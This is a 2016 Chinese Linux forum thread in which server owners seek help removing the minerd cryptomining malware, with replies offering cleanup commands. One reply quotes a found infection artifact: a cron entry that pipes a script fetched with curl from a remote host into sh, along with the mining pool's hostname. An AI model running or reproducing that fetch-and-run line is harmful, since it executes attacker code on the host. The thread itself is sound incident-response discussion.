论坛徽章:: 0

电梯直达

1楼 [收藏(0)] [报告]

发表于 2016-07-13 17:44 |只看该作者 |倒序浏览

Linux 服务器被入侵植入了 /opt/minerd 程序，被当做挖矿肉鸡了。在网上找的方法都不管用，清除掉cron 里面的任务， crontab -l 已经 no crontab for root 了，并停止 crond 服务了，删除掉系统里面全部名字包含 miner 的文件，然后杀掉 minerd 进程，删掉 /opt/minerd 文件，进程还是会几分钟后就自动启动起来。
求大神支招！！拜谢

文库|博客

tabtty

白手起家

论坛徽章:: 0

2楼 [报告]

发表于 2016-07-13 18:07 |只看该作者

系统里面自动生成一个 /usr/local/etc/minerd.conf 文件，内容是登陆到目标地址的配置，把里面内容改掉了。然后进程会自动重启，还是显示原来的内容。删掉这文件也不管用。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

Shell_HAT

版主

论坛徽章:: 33

3楼 [报告]

发表于 2016-07-13 21:34 |只看该作者

cd /usr/local/etc/
:>minerd.conf
chmod 000 minerd.conf
chattr +i minerd.conf

复制代码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

tabtty

白手起家

论坛徽章:: 0

4楼 [报告]

发表于 2016-07-14 11:54 |只看该作者

回复 3# Shell_HAT

方法不错。这个可以让木马程序不往对端发送消息了。但自身 /opt/minerd 程序还是在运行，在消耗大量CPU资源。
能否还有啥办法可以彻底清除这个木马呢

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

Shell_HAT

版主

论坛徽章:: 33

5楼 [报告]

发表于 2016-07-14 12:43 |只看该作者

回复 4# tabtty

cd /opt/
killall minerd
:>minerd
chmod 000 minerd
chattr +i minerd

复制代码

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

73052

白手起家

论坛徽章:: 0

6楼 [报告]

发表于 2016-07-16 19:19 |只看该作者

服务器受到同样的攻击了，有彻底解决的方法吗

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

RE_HASH

小富即安

论坛徽章:: 6

7楼 [报告]

发表于 2016-07-16 21:36 |只看该作者

本帖最后由 RE_HASH 于 2016-07-16 21:37 编辑

外面的帖子：
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -

On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

RE_HASH

小富即安

论坛徽章:: 6

8楼 [报告]

发表于 2016-07-16 21:41 |只看该作者

系统安全是问题，删掉了病毒可漏洞还在。清查一下有啥老版本的软件，WordPress之类的。

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

73052

白手起家

论坛徽章:: 0

9楼 [报告]

发表于 2016-07-16 21:52 |只看该作者

回复 8# RE_HASH

没有lady这个服务

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

RE_HASH

小富即安

论坛徽章:: 6

10楼 [报告]

发表于 2016-07-16 22:26 |只看该作者

看看有没有别的怪模怪样的service
service --status-all

原帖：
http:....//security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance

实战分享：从技术角度谈机器学习入门| 【大话IT】RadonDB低门槛向MySQL集群下战书 | ChinaUnix打赏功能已上线！ | 新一代分布式关系型数据库RadonDB知多少？

12 / 2 页下一页

返回列表

Chinaunix › 论坛 › 程序设计 › Shell › 服务器被入侵，做了minerd挖矿机了，清理不掉，求大神

[系统管理] 服务器被入侵，做了minerd挖矿机了，清理不掉，求大神 [复制链接]